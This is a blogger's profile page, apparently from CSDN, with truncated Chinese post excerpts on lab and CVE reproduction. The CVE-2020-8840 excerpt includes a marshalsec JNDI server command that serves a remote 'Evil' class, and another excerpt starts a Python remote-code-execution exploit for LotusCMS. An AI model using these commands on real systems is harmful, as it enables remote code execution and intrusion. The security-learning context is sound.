- 博客(10)
- 收藏
- 关注
RSS订阅原创 龙蜥Anolis OS使用SXSSF导出Excel时createSheet空指针错误
操作系统环境为 Anolis OS 版本8.8,系统没有内置fontconfig导致SXSSF空指针错误。
2024-08-26 14:46:07
182
1
原创 CVE-2020-8840复现(xbean-reflect利用链)
CVE-2020-8840复现(xbean-reflect利用链)搭建环境漏洞演示遇到的问题搭建环境下载marshalsec并编译,启动jndi环境java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer https://www.youi.xin/#Evil编写Evil.java,内容如下:public class Evil { public Evil(){ try{
2020-12-18 21:21:17
2027
1
原创 Ubuntu 20.04.1开启root登录
step1 修改root密码使用普通账户登录系统,修改root密码sudo passwd rootstep2 修改lightdm配置sudo vim /usr/share/lightdm/lightdm.conf.d/50-ubuntu.conf增加两行配置greeter-show-manual-login=trueall-guest=false 参考图片:step31. 修改 /etc/pam.d/gdm-autologinsudo vim /etc/pam.d/gdm-a
2020-09-18 14:34:53
2481
原创 类OSCP靶机-KioptixVM3(LotusCMS漏洞)
靶机练习1.通过对目标主机扫描发现80端口存在WEB登录界面看到了lotusCMS通过exploit搜索lotusCMS发现存在一个远程代码执行漏洞:https://www.exploit-db.com/exploits/18565.但是给到的EXP为msfconsole(之前讲过尽量不使用metasploit)可以直接利用,我们这里编写的exp来获取shell。from requests import getimport reimport randomfrom urllib import
2020-08-23 16:58:02
1526
原创 类OSCP靶机-Kioptix Level 2
同步发布:https://www.youi.xin/?p=4491.信息收集环境部署可参考上一篇https://www.youi.xin/?p=435通过对c段扫描发现了靶机ip,nmap扫描目标端口信息如下:PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)| ssh-hostkey: | 1024 8f:3e:8b:1e:58:63:fe:cf:27:a.
2020-08-02 09:57:06
485
原创 类OSCP靶机-Kioptix Level 1
同步发布:https://www.youi.xin/?p=435类OSCP靶机-Kioptix Level 1官方下载地址:Kioptrix: Level 1 (#1): https://www.vulnhub.com/entry/kioptrix-level-1-1,22/百度云下载地址:链接:https://pan.baidu.com/s/1aYc6P2aqPCL4jY1H-G6Z1w提取码:youivulnhub简介https://www.vulnhub.com/about/
2020-07-29 21:57:32
1035
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人